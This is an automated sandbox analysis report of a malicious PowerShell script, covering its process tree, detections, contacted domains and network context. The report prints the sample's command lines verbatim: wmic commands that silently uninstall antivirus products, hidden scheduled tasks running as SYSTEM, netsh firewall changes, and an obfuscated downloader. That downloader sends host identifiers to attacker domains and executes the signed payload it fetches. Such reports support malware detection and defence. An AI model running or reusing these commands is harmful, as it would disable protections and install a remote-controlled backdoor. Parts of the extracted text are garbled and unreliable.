ID: 435601 Sample Name: malicious.ps1 Cookbook: default.jbs Time: 18:26:42 Date: 16/06/2021 Version: 32.0.0 Black Diamond Table of Contents
Table of Contents 2 Windows Analysis Report malicious.ps1 4 Overview 4 General Information 4 Detection 4 Signatures 4 Classification 4 Process Tree 4 Malware Configuration 5 Yara Overview 6 Sigma Overview 6 System Summary: 6 Persistence and Installation Behavior: 6 Signature Overview 6 AV Detection: 6 System Summary: 6 Data Obfuscation: 6 Persistence and Installation Behavior: 6 Boot Survival: 6 Malware Analysis System Evasion: 6 Lowering of HIPS / PFW / Operating System Security Settings: 6 Mitre Att&ck Matrix 7 Behavior Graph 7 Screenshots 8 Thumbnails 8 Antivirus, Machine Learning and Genetic Malware Detection 9 Initial Sample 9 Dropped Files 9 Unpacked PE Files 9 Domains 9 URLs 9 Domains and IPs 10 Contacted Domains 10 Contacted URLs 10 URLs from Memory and Binaries 10 Contacted IPs 10 Public 10 General Information 10 Simulations 11 Behavior and APIs 11 Joe Sandbox View / Context 11 IPs 11 Domains 11 ASN 12 JA3 Fingerprints 12 Dropped Files 12 Created / dropped Files 12 Static File Info 19 General 19 File Icon 19 Network Behavior 19 Network Port Distribution 19 TCP Packets 19 UDP Packets 19 DNS Queries 19 DNS Answers 20 HTTP Request Dependency Graph 20 HTTP Packets 20 Code Manipulations 21 Statistics 21 Behavior 21 System Behavior 21 Analysis Process: powershell.exe PID: 7148 Parent PID: 5984 21 General 21 File Activities 22 File Created 22 File Deleted 22 File Written 22 File Read 22 Analysis Process: conhost.exe PID: 6164 Parent PID: 7148 22 General 22 Analysis Process: powershell.exe PID: 5916 Parent PID: 7148 22 General 22 File Activities 22 File Created 23 Copyright Joe Security LLC 2021 Page 2 of 34 File Deleted 23 File Written 23 File Read 23 Analysis Process: cmd.exe PID: 2856 Parent PID: 7148 23 General 23 File Activities 23 Analysis Process: WMIC.exe PID: 6488 Parent PID: 2856 23 General 23 File Activities 23 File Written 23 Analysis Process: cmd.exe PID: 1076 Parent PID: 7148 23 General 23 File Activities 24 Analysis Process: WMIC.exe PID: 5216 Parent PID: 1076 24 General 24 File Activities 24 File Written 24 Analysis Process: cmd.exe PID: 5960 Parent PID: 7148 24 General 24 Analysis Process: WMIC.exe PID: 6176 Parent PID: 5960 24 General 24 Analysis Process: cmd.exe PID: 2240 Parent PID: 7148 25 General 25 Analysis Process: WMIC.exe PID: 6332 Parent PID: 2240 25 General 25 Analysis Process: cmd.exe PID: 6172 Parent PID: 7148 25 General 25 Analysis Process: WMIC.exe PID: 6796 Parent PID: 6172 26 General 26 Analysis Process: cmd.exe PID: 4904 Parent PID: 7148 26 General 26 Analysis Process: WMIC.exe PID: 6992 Parent PID: 4904 26 General 26 Analysis Process: cmd.exe PID: 4780 Parent PID: 7148 27 General 27 Analysis Process: WMIC.exe PID: 7032 Parent PID: 4780 27 General 27 Analysis Process: cmd.exe PID: 7048 Parent PID: 7148 27 General 27 Analysis Process: schtasks.exe PID: 1668 Parent PID: 7148 27 General 27 Analysis Process: schtasks.exe PID: 3880 Parent PID: 7148 28 General 28 Analysis Process: powershell.exe PID: 6132 Parent PID: 968 28 General 28 Analysis Process: conhost.exe PID: 4676 Parent PID: 6132 28 General 28 Analysis Process: schtasks.exe PID: 5448 Parent PID: 7148 29 General 29 Analysis Process: schtasks.exe PID: 5756 Parent PID: 7148 29 General 29 Analysis Process: schtasks.exe PID: 6036 Parent PID: 7148 29 General 29 Analysis Process: powershell.exe PID: 2804 Parent PID: 968 29 General 29 Analysis Process: conhost.exe PID: 6980 Parent PID: 2804 30 General 30 Analysis Process: schtasks.exe PID: 5628 Parent PID: 7148 30 General 30 Analysis Process: schtasks.exe PID: 6372 Parent PID: 7148 30 General 30 Analysis Process: powershell.exe PID: 6620 Parent PID: 968 31 General 31 Analysis Process: conhost.exe PID: 6300 Parent PID: 6620 31 General 31 Analysis Process: cmd.exe PID: 6672 Parent PID: 7148 31 General 31 Analysis Process: netsh.exe PID: 5840 Parent PID: 6672 32 General 32 Analysis Process: netsh.exe PID: 6508 Parent PID: 7148 32 General 32 Analysis Process: netsh.exe PID: 6668 Parent PID: 7148 32 General 32 Analysis Process: netsh.exe PID: 5772 Parent PID: 7148 32 General 32 Analysis Process: schtasks.exe PID: 4244 Parent PID: 7148 33 General 33 Analysis Process: schtasks.exe PID: 6176 Parent PID: 7148 33 General 33 Analysis Process: schtasks.exe PID: 2464 Parent PID: 7148 33 General 33 Analysis Process: schtasks.exe PID: 4968 Parent PID: 7148 34 General 34 Disassembly 34 Code Analysis 34
Copyright Joe Security LLC 2021 Page 3 of 34 Windows Analysis Report malicious.ps1
Overview
General Information Detection Signatures Classification
Sample malicious.ps1 Name: Muullltttiii AAVV SSccaannnneerrr ddeettteecctttiiioonn fffoorrr ddoomaa…
Analysis ID: 435601 SMSiiigugmlti aaA dVde eSttteecccatttneendde::: rSS dccehhteeddcuutilloleen ss fyyossrtt tedemom ppa… MD5: 75f885a4e9484ce… CSCrirrgeemaatttaee ssd efffiiiltlleescs t iieinnd tt:th hSeec sshyyessdttteuemle3 3s22y scctooennmfffiii ggp… SHA1: cd3ef6f1125a23a… MCrooeddaiiifftfiieieesss f ttithlheees wwiniiin ntdhdoeow wssys s fffiitirrereemww3aa2llllll config Ransomware SHA256: 7829a0b0e536f60… Miner Spreading OMbobffdfuuisfsicecasat ttetehdde c cwoomindmoaawnnsdd f lilliriinneeew faffoolulunndd Infos: mmaallliiiccciiioouusss POPoobwwfueesrrrcssahhteellldlll d dcrrroomppssm PPaEnE d fffi iillleiene found malicious Evader Phishing
sssuusssppiiiccciiioouusss
suspicious Powershell drops PE file RPReoenwnaaemrseehsse lppl odowrwoeeprrrss hhPeeEllllll. ..efeilxxeee tttoo bbyyppaassss … cccllleeaann Most interesting Screenshot: clean
SRSueusnsppaiiimcciiioeousus sp popowowweeresrrrshshehelel.llllell cxcoeom tom baaynnpdda lslliiinsne e… Exploiter Banker
USUsusesesps i ncnieeotttussshh ptttoo wmeoordsdihiifffyey lttlth hceeo Wmmiiinnaddnoodww slsi n nne…
Spyware Trojan / Bot
UUsseess snscechhtstttahas stkkoss .m..eexoxede i ofoyrrr taahttte...ee Wxxeei n tttodo o aawddsdd n … Adware Score: 88 Range: 0 - 100 CUCosonentsttaa siiinncssh tccaaasppkaasb.beiiilllxiiittteiiiee sos r tt toao t d.deeexttteec ctttot v vaiiirrrdtttuudaa …
Whitelisted: false CCoonntttaaiiinnss llclooannpgga sbsllileleieteieppss t(((o>> ==d e 33t e mcitiin nv)))irtua Confidence: 100% CCrroreenaattatteeinss s aa l oppnrrrogoc cseelsesses piiinns ss(u>us=sp p3ee nmnddiened)d moo…
CCrrreeaattteess ffafiiill leepssr o iiincnsesiisiddsee i nttthh seeu ssyypssetttenemde ddi iirrmreecoc…
CCrrreeaattteess ofoirlrre ms oionddsiiififfidiieeess t whweiiinn dsdyooswwtess m sse edrrrvivrieiiccceess
DCDereellleeattteess fffoiiilllere sms iioinndssiiifddiees tt thwheein Wdoiiinnwddsoo wswessr vfffoioclllded…s Process Tree DDeettlteectcetttesed df i lppeoostt teiennnstttiiiadalell c ctrrhryyepp ttWtoo ifffnuudnnoccwtttiiioosn nfold
DDrrerootpeppcpteedd fffpiiillleoe t seseneeteinan l i iincn r cycopontnonn efeuccntttiiciootnino wnwiiittthh…
DDrrrooppsps e PPdEE f ifflfieiilllee sseen in connection with
DDrrrooppss PPEE fffiiillleess tttoo ttthhee wwiiinnddoowwss ddiiirrreeccttt…
EDEnrnoaapbbslllee Pss E dd eefiblbeuusgg t popr rrtiiivhvieiilllee wggeienssdows direct
FEFonouaunbndlde asa hdhieiiggbhhu ngnu upmribvbeielerrr g ooefff s Wiiinnddooww /// UUss…
HFHoTTuTTnPPd G aE EhTTig ohorr r n PPuOmSSbTTe r ww oiiittfth hWoouuinttt d aao uwuss e/e rrUr …s
IIHIPPT aaTddPdd rGrreeEsssTs ssoeere ePnnO iiinnS cTco ownnnintheeocctuttiiioto nan wuwsiiitttehhr oo…
IIInPnttt eearrrdnndeerttte PPsrsrroo svveiiiddeeenrrr isnsee ceeonnn iinine ccootinonnne ewccttititiiohon no…
MInataeyyr nssellleete ePppr o(((evevivdaaessriii vvsee ellloonoo pipnss )c)) otttoon nhheiiinncddtieoerrnr …
Moaonyni iittstoolerrrsse pcce e(rrertttavaaiiinns irrrveeegg iilisosttotrrrypy s kk)ee tyyoss h /// i nvvadalelluur…
PMPEEo n fffiiilltleeo rccsoo cnnetttaartiiinansisn s srttetrrraganinsggtreey rrrkeeessyoosuu rr/rc cveeasslu
QPEuue efrirrliiiee ssc ossenentnassiiniitttisiivv ese t Orappneegrrreaa ttrtiiiennsggo SSuyrycssettteesm…
Quueerrriiieess ttsthheeen vsvoiotilllvuuem Oee p iiinnefffrooarrrtminagatt tiiSioonyns (((tnenamam…
SQSiiiuggemraiae sdd eethttteecc vttteeoddlu::: m NNee tttissnhhfo PPrmoorrrattt t FiFooonrrr ww(naaarrrdmd…
SSiiiggmaa ddeettteeccttteedd::: NNeetttsshh PPoorrrttt oForror ArAwppapprlllidii…
SSiiiggmaa ddeettteeccttteedd::: NNoeontns IhIInn tPtteeorrraratc cotttiiirvv eAe pPPpoolwiw…
USUsisgeemss a cc ododedetee ocobtbefffudus:s cNcaaotttiniioo nInn ttteecrcahhcnntiiiqqvueue ePss o (((w…
VUVeserreryys l lloconongdg e cc mobddflluliiinnsece a ootpipotttiniioo ntne ffcfoohuunnniqddu,,, ettthhsiii ss(…
Very long cmdline option found, this
Copyright Joe Security LLC 2021 Page 4 of 34 System is w10x64 powershell.exe (PID: 7148 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -noLogo -ExecutionPolicy unrestricted -file 'C:\Users\user\Desktop\mal icious.ps1' MD5: 95000560239032BC68B4C2FDFCDEF913) conhost.exe (PID: 6164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) powershell.exe (PID: 5916 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -c IEx =gim MD5: 95000560239032BC68B4C2FDFCDEF913) cmd.exe (PID: 2856 cmdline: 'C:\Windows\system32\cmd.exe' /c start /b wmic.exe product where 'name like '%Eset%'' call uninstall /nointeractive MD5: 4E2ACF4F8A396486AB4268C94A6A245F) WMIC.exe (PID: 6488 cmdline: wmic.exe product where 'name like '%Eset%'' call uninstall /nointeractive MD5: EC80E603E0090B3AC3C1234C2BA43A0F) cmd.exe (PID: 1076 cmdline: 'C:\Windows\system32\cmd.exe' /c start /b wmic.exe product where 'name like '%%Kaspersky%%'' call uninstall /nointeractive MD5: 4E2ACF4F8A396486AB4268C94A6A245F) WMIC.exe (PID: 5216 cmdline: wmic.exe product where 'name like '%%Kaspersky%%'' call uninstall /nointeractive MD5: EC80E603E0090B3AC3C1234C2BA43A0F) cmd.exe (PID: 5960 cmdline: 'C:\Windows\system32\cmd.exe' /c start /b wmic.exe product where 'name like '%avast%'' call uninstall /nointeractive MD5: 4E2ACF4F8A396486AB4268C94A6A245F) WMIC.exe (PID: 6176 cmdline: wmic.exe product where 'name like '%avast%'' call uninstall /nointeractive MD5: EC80E603E0090B3AC3C1234C2BA43A0F) cmd.exe (PID: 2240 cmdline: 'C:\Windows\system32\cmd.exe' /c start /b wmic.exe product where 'name like '%avp%'' call uninstall /nointeractive MD5: 4E2ACF4F8A396486AB4268C94A6A245F) WMIC.exe (PID: 6332 cmdline: wmic.exe product where 'name like '%avp%'' call uninstall /nointeractive MD5: EC80E603E0090B3AC3C1234C2BA43A0F) cmd.exe (PID: 6172 cmdline: 'C:\Windows\system32\cmd.exe' /c start /b wmic.exe product where 'name like '%Security%'' call uninstall /nointeractive MD5: 4E2ACF4F8A396486AB4268C94A6A245F) WMIC.exe (PID: 6796 cmdline: wmic.exe product where 'name like '%Security%'' call uninstall /nointeractive MD5: EC80E603E0090B3AC3C1234C2BA43A0F) cmd.exe (PID: 4904 cmdline: 'C:\Windows\system32\cmd.exe' /c start /b wmic.exe product where 'name like '%AntiVirus%'' call uninstall /nointeractive MD5: 4E2ACF4F8A396486AB4268C94A6A245F) WMIC.exe (PID: 6992 cmdline: wmic.exe product where 'name like '%AntiVirus%'' call uninstall /nointeractive MD5: EC80E603E0090B3AC3C1234C2BA43A0F) cmd.exe (PID: 4780 cmdline: 'C:\Windows\system32\cmd.exe' /c start /b wmic.exe product where 'name like '%Norton Security%'' call uninstall /nointeractive MD5: 4E2ACF4F8A396486AB4268C94A6A245F) WMIC.exe (PID: 7032 cmdline: wmic.exe product where 'name like '%Norton Security%'' call uninstall /nointeractive MD5: EC80E603E0090B3AC3C1234C2BA43A0F) cmd.exe (PID: 7048 cmdline: 'C:\Windows\system32\cmd.exe' /c C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe /verysilent /suppressmsgboxes /norestart MD5: 4E2ACF4F8A396486AB4268C94A6A245F) schtasks.exe (PID: 1668 cmdline: 'C:\Windows\system32\schtasks.exe' /create /ru system /sc MINUTE /mo 120 /tn blackball1 /F /tr blackball1 MD5: 838D346D1D28F00783B7A6C6BD03A0DA) schtasks.exe (PID: 3880 cmdline: 'C:\Windows\system32\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /tn \hOSkYCwoL /F /tr 'powershell -w hidden -c PS_CMD' MD5: 838D346D1D28F00783B7A6C6BD03A0DA) schtasks.exe (PID: 5448 cmdline: 'C:\Windows\system32\schtasks.exe' /run /tn \hOSkYCwoL MD5: 838D346D1D28F00783B7A6C6BD03A0DA) schtasks.exe (PID: 5756 cmdline: 'C:\Windows\system32\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /tn RabFBPMZ\r1JNCdQED0 /F /tr 'powershell -w hidden -c PS _CMD' MD5: 838D346D1D28F00783B7A6C6BD03A0DA) schtasks.exe (PID: 6036 cmdline: 'C:\Windows\system32\schtasks.exe' /run /tn RabFBPMZ\r1JNCdQED0 MD5: 838D346D1D28F00783B7A6C6BD03A0DA) schtasks.exe (PID: 5628 cmdline: 'C:\Windows\system32\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /tn MicroSoft\Windows\k7xmVIWZ\FKaz6wpoqO /F /tr 'powershe ll -w hidden -c PS_CMD' MD5: 838D346D1D28F00783B7A6C6BD03A0DA) schtasks.exe (PID: 6372 cmdline: 'C:\Windows\system32\schtasks.exe' /run /tn MicroSoft\Windows\k7xmVIWZ\FKaz6wpoqO MD5: 838D346D1D28F00783B7A6C6BD03A0DA) cmd.exe (PID: 6672 cmdline: 'C:\Windows\system32\cmd.exe' /c netsh.exe firewall add portopening tcp 65529 SDNSd MD5: 4E2ACF4F8A396486AB4268C94A6A245F) netsh.exe (PID: 5840 cmdline: netsh.exe firewall add portopening tcp 65529 SDNSd MD5: 98CC37BBF363A38834253E22C80A8F32) netsh.exe (PID: 6508 cmdline: 'C:\Windows\system32\netsh.exe' interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53 MD5: 98CC37BBF363A38834253E22C80A8F32) netsh.exe (PID: 6668 cmdline: 'C:\Windows\system32\netsh.exe' advfirewall firewall add rule name=deny445 dir=in protocol=tcp localport=445 action=block MD5: 98CC37BBF363A38834253E22C80A8F32) netsh.exe (PID: 5772 cmdline: 'C:\Windows\system32\netsh.exe' advfirewall firewall add rule name=deny135 dir=in protocol=tcp localport=135 action=block MD5: 98CC37BBF363A38834253E22C80A8F32) schtasks.exe (PID: 4244 cmdline: 'C:\Windows\system32\schtasks.exe' /delete /tn blackball /F MD5: 838D346D1D28F00783B7A6C6BD03A0DA) schtasks.exe (PID: 6176 cmdline: 'C:\Windows\system32\schtasks.exe' /delete /tn t.pp6r1.com /F MD5: 838D346D1D28F00783B7A6C6BD03A0DA) schtasks.exe (PID: 2464 cmdline: 'C:\Windows\system32\schtasks.exe' /delete /tn Rtsa2 /F MD5: 838D346D1D28F00783B7A6C6BD03A0DA) schtasks.exe (PID: 4968 cmdline: 'C:\Windows\system32\schtasks.exe' /delete /tn Rtsa1 /F MD5: 838D346D1D28F00783B7A6C6BD03A0DA) powershell.exe (PID: 6132 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c PS_CMD MD5: 95000560239032BC68B4C2FDFCDEF913) conhost.exe (PID: 4676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) powershell.exe (PID: 2804 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient).'DownloadDa ta'($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('xpVT7bCpITDUjAvmzli5 5WPVFPjQBos7o9/ZbbWzyeaKIn9NLJwvY6ad3rMGoXzT6mz+51VupKm5TQvk79oVK4QQDZErhr0szpUdW79j2WPhbmpZrwMdgmFHrqG6Np+InWy/V1acp09/W9x54mpQ1E HIos1+JhSrYPaq8WtsGW0=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.oul'+'er.cc';a($url+'/a.jsp?_20210616?'+ (@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*')) MD5: 95000560239032BC68B4C2FDFCDEF913) conhost.exe (PID: 6980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) powershell.exe (PID: 6620 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient).'DownloadDa ta'($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('xpVT7bCpITDUjAvmzli5 5WPVFPjQBos7o9/ZbbWzyeaKIn9NLJwvY6ad3rMGoXzT6mz+51VupKm5TQvk79oVK4QQDZErhr0szpUdW79j2WPhbmpZrwMdgmFHrqG6Np+InWy/V1acp09/W9x54mpQ1E HIos1+JhSrYPaq8WtsGW0=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.nte'+'le.net';a($url+'/a.jsp?_20210616?'+ (@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*')) MD5: 95000560239032BC68B4C2FDFCDEF913) conhost.exe (PID: 6300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) cleanup
Malware Configuration
No configs have been found
Copyright Joe Security LLC 2021 Page 5 of 34 Yara Overview
No yara matches
Sigma Overview
System Summary:
Sigma detected: Netsh Port Forwarding
Sigma detected: Netsh Port or Application Allowed
Sigma detected: Non Interactive PowerShell
Persistence and Installation Behavior:
Sigma detected: Schedule system process
Signature Overview
Click to jump to signature section
AV Detection:
Multi AV Scanner detection for domain / URL
System Summary:
Powershell drops PE file
Data Obfuscation:
Obfuscated command line found
Suspicious powershell command line found
Persistence and Installation Behavior:
Creates files in the system32 config directory
Boot Survival:
Uses schtasks.exe or at.exe to add and modify task schedules
Malware Analysis System Evasion:
Renames powershell.exe to bypass HIPS
Lowering of HIPS / PFW / Operating System Security Settings:
Modifies the windows firewall
Uses netsh to modify the Windows network and firewall settings
Copyright Joe Security LLC 2021 Page 6 of 34 Mitre Att&ck Matrix
Initial Privilege Credential Lateral Command Network Access Execution Persistence Escalation Defense Evasion Access Discovery Movement Collection Exfiltration and Control Effects Valid Windows Windows Windows Masquerading 1 2 1 OS Query Registry 1 Remote Archive Exfiltration Encrypted Eavesdrop on Accounts Management Service 1 Service 1 Credential Services Collected Over Other Channel 1 Insecure Instrumentation 1 Dumping Data 1 Network Network Medium Communication Default Command and Scheduled Process Disable or Modify LSASS Security Software Remote Data from Exfiltration Ingress Tool Exploit SS7 to Accounts Scripting Task/Job 1 Injection 1 2 Tools 2 Memory Discovery 2 1 Desktop Removable Over Transfer 1 Redirect Phone Interpreter 1 1 Protocol Media Bluetooth Calls/SMS
Domain Scheduled Logon Script Scheduled Virtualization/Sandbox Security Process Discovery 2 SMB/Windows Data from Automated Non- Exploit SS7 to Accounts Task/Job 1 (Windows) Task/Job 1 Evasion 4 1 Account Admin Shares Network Exfiltration Application Track Device Manager Shared Layer Location Drive Protocol 2 Local PowerShell 2 1 Logon Script Logon Script Process Injection 1 2 NTDS Virtualization/Sandbox Distributed Input Scheduled Application SIM Card Accounts (Mac) (Mac) Evasion 4 1 Component Capture Transfer Layer Swap Object Model Protocol 2 Cloud Cron Network Network Deobfuscate/Decode LSA Application Window SSH Keylogging Data Fallback Manipulate Accounts Logon Script Logon Script Files or Information 1 Secrets Discovery 1 Transfer Channels Device Size Limits Communication
Replication Launchd Rc.common Rc.common Obfuscated Files or Cached Remote System VNC GUI Input Exfiltration Multiband Jamming or Through Information 1 Domain Discovery 1 Capture Over C2 Communication Denial of Removable Credentials Channel Service Media External Scheduled Task Startup Startup Items File Deletion 1 DCSync File and Directory Windows Web Portal Exfiltration Commonly Rogue Wi-Fi Remote Items Discovery 1 Remote Capture Over Used Port Access Points Services Management Alternative Protocol Drive-by Command and Scheduled Scheduled Indicator Removal from Proc System Information Shared Credential Exfiltration Application Downgrade to Compromise Scripting Task/Job Task/Job Tools Filesystem Discovery 2 1 Webroot API Over Layer Protocol Insecure Interpreter Hooking Symmetric Protocols Encrypted Non-C2 Protocol
Behavior Graph
Copyright Joe Security LLC 2021 Page 7 of 34 Hide Legend Legend: Process Signature Behavior Graph ID: 435601 Created File Sample: malicious.ps1
Startdate: 16/06/2021
Architecture: WINDOWS DNS/IP Info
Score: 88 Is Dropped
Multi AV Scanner detection Sigma detected: Schedule Suspicious powershell Obfuscated command line started started started started for domain / URL system process command line found found Is Windows Process
Number of created Registry Values powershell.exe powershell.exe powershell.exe powershell.exe Number of created Files
23 Visual Basic
cvc.7766.org Delphi
209.141.33.145, 49758, 80 t.ouler.cc dropped t.ntele.net PONYNETUS United States Java .Net C# or VB.NET
started started started C:\Windows\System32\...\ncETd2A.exe, PE32+ started started started C, C++ or other language
Uses schtasks.exe or Suspicious powershell Modifies the windows Powershell drops PE Renames powershell.exe Creates files in the at.exe to add and modify Is malicious command line found firewall file to bypass HIPS system32 config directory task schedules Internet
cmd.exe cmd.exe cmd.exe conhost.exe conhost.exe conhost.exe
22 other processes
1 1
1.1.1.1 CLOUDFLARENETUS Australia
started started started started started started
Uses netsh to modify the Windows network and firewall settings
WMIC.exe WMIC.exe WMIC.exe WMIC.exe WMIC.exe WMIC.exe
2 other processes
1 1
Screenshots
Thumbnails This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Copyright Joe Security LLC 2021 Page 8 of 34 Antivirus, Machine Learning and Genetic Malware Detection
Initial Sample
No Antivirus matches
Dropped Files
Source Detection Scanner Label Link C:\Windows\System32\WindowsPowerShell\v1.0\ncETd2A.exe 3% Metadefender Browse C:\Windows\System32\WindowsPowerShell\v1.0\ncETd2A.exe 0% ReversingLabs
Unpacked PE Files
No Antivirus matches
Domains
Source Detection Scanner Label Link cvc.7766.org 9% Virustotal Browse t.ntele.net 7% Virustotal Browse t.ouler.cc 11% Virustotal Browse
URLs
Copyright Joe Security LLC 2021 Page 9 of 34 Source Detection Scanner Label Link crl.m 0% URL Reputation safe crl.m 0% URL Reputation safe crl.m 0% URL Reputation safe crl.m 0% URL Reputation safe pesterbdd.com/images/Pester.png 0% URL Reputation safe pesterbdd.com/images/Pester.png 0% URL Reputation safe pesterbdd.com/images/Pester.png 0% URL Reputation safe pesterbdd.com/images/Pester.png 0% URL Reputation safe t.ouler.cc/a.jsp?_20210616?computer*computer$*FB9C3542-FA73-1B4E-FBA4- 0% Avira URL Cloud safe 60E77BE54AED*903551864 https://go.micro 0% URL Reputation safe https://go.micro 0% URL Reputation safe https://go.micro 0% URL Reputation safe https://go.micro 0% URL Reputation safe https://contoso.com/ 0% URL Reputation safe https://contoso.com/ 0% URL Reputation safe https://contoso.com/ 0% URL Reputation safe https://contoso.com/ 0% URL Reputation safe https://contoso.com/License 0% URL Reputation safe https://contoso.com/License 0% URL Reputation safe https://contoso.com/License 0% URL Reputation safe https://contoso.com/License 0% URL Reputation safe https://contoso.com/Icon 0% URL Reputation safe https://contoso.com/Icon 0% URL Reputation safe https://contoso.com/Icon 0% URL Reputation safe https://contoso.com/Icon 0% URL Reputation safe
Domains and IPs
Contacted Domains
Name IP Active Malicious Antivirus Detection Reputation cvc.7766.org 209.141.33.145 true true 9%, Virustotal, Browse unknown t.ntele.net unknown unknown true 7%, Virustotal, Browse unknown t.ouler.cc unknown unknown true 11%, Virustotal, Browse unknown
Contacted URLs
Name Malicious Antivirus Detection Reputation t.ouler.cc/a.jsp?_20210616?computer*computer$*FB9C3542-FA73-1B4E-FBA4- false Avira URL Cloud: safe unknown 60E77BE54AED*903551864
URLs from Memory and Binaries
Contacted IPs
Public
IP Domain Country Flag ASN ASN Name Malicious 1.1.1.1 unknown Australia 13335 CLOUDFLARENETUS false 209.141.33.145 cvc.7766.org United States 53667 PONYNETUS true
General Information
Joe Sandbox Version: 32.0.0 Black Diamond Analysis ID: 435601
Copyright Joe Security LLC 2021 Page 10 of 34 Start date: 16.06.2021 Start time: 18:26:42 Joe Sandbox Product: CloudBasic Overall analysis duration: 0h 9m 42s Hypervisor based Inspection enabled: false Report type: light Sample file name: malicious.ps1 Cookbook file name: default.jbs Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 Number of analysed new started processes 56 analysed: Number of new started drivers analysed: 0 Number of existing processes analysed: 0 Number of existing drivers analysed: 0 Number of injected processes analysed: 0 Technologies: HCA enabled EGA enabled HDC enabled AMSI enabled Analysis Mode: default Analysis stop reason: Timeout Detection: MAL Classification: mal88.evad.winPS1@73/34@3/2 EGA Information: Failed HDC Information: Failed HCA Information: Successful, ratio: 95% Number of executed functions: 0 Number of non-executed functions: 0 Cookbook Comments: Adjust boot time Enable AMSI Found application associated with file extension: .ps1
Warnings: Show All
Simulations
Behavior and APIs
Time Type Description 18:27:31 API Interceptor 221x Sleep call for process: powershell.exe modified 18:28:12 API Interceptor 7x Sleep call for process: WMIC.exe modified 18:28:21 Task Scheduler Run new task: blackball1 path: blackball1 18:28:21 Task Scheduler Run new task: hOSkYCwoL path: powershell s>-w hidden -c PS_CMD
Joe Sandbox View / Context
IPs
Match Associated Sample Name / URL SHA 256 Detection Link Context 1.1.1.1 QQ9.0.1.exe Get hash malicious Browse url-quality- stat.xf .qq.com/An alyze/Data? v=1&&form at=json&&q q=0&&cmd=2 1&&product =qqdownload
Domains
Match Associated Sample Name / URL SHA 256 Detection Link Context
Copyright Joe Security LLC 2021 Page 11 of 34 ASN
Match Associated Sample Name / URL SHA 256 Detection Link Context CLOUDFLARENETUS Oginal BL-Invoice & Packing List.exe Get hash malicious Browse 104.21.19.200 e621ca05.exe Get hash malicious Browse 104.20.184.68 app.exe Get hash malicious Browse 172.67.131.148 unk.exe Get hash malicious Browse 172.67.137.101 (786) 545-7301-Saisd.net.html Get hash malicious Browse 104.16.18.94 TrueKey.exe Get hash malicious Browse 162.159.13 7.232 file4.exe Get hash malicious Browse 172.67.158.27 file3s.exe Get hash malicious Browse 104.21.10.13 Request for Quotation # 3200025006.exe Get hash malicious Browse 104.21.46.55 SOA_16.06.21.exe Get hash malicious Browse 172.67.188.154
SKMBT69150632L.exe Get hash malicious Browse 172.67.128.232 chems.exe Get hash malicious Browse 172.67.161.52 Price inquiry.16.06.2021.pdf.exe Get hash malicious Browse 172.67.188.154 efXOVjQ8K7.exe Get hash malicious Browse 104.21.14.60 INVOICE.htm Get hash malicious Browse 104.16.18.94 PFF_FK_2021020040.doc Get hash malicious Browse 104.21.14.60 090000090.exe Get hash malicious Browse 172.67.188.154 Quotation Mitchell_RFQ_36496.exe Get hash malicious Browse 104.21.15.48 payment confirmation for our 30% deposit.exe Get hash malicious Browse 23.227.38.74 O532dms5LV.exe Get hash malicious Browse 172.67.158.27 PONYNETUS SecuriteInfo.com.Trojan.PackedNET.835.27578.exe Get hash malicious Browse 209.141.34.39 FLI_0741000.doc Get hash malicious Browse 209.141.34.39 SecuriteInfo.com.BackDoor.Rat.281.18292.exe Get hash malicious Browse 198.98.57.207 3dHwCEZMSu.exe Get hash malicious Browse 209.141.34.39 RFL0784510200.exe Get hash malicious Browse 209.141.59.251 CZPJKhArIM.exe Get hash malicious Browse 198.98.49.129 jRrdnjW5EV.exe Get hash malicious Browse 209.141.34.39 exxsdee.x86 Get hash malicious Browse 205.185.12 6.254 exxsdee.arm7 Get hash malicious Browse 205.185.12 6.254 IMG_15_60_103_681.xlsx Get hash malicious Browse 198.98.60.43 HUa0EaTZco.exe Get hash malicious Browse 205.185.127.90 WEDWOxq7uf Get hash malicious Browse 205.185.12 4.100 67k23Rdo5x.exe Get hash malicious Browse 199.195.25 3.181 ANBoKU1Ei8.exe Get hash malicious Browse 199.195.25 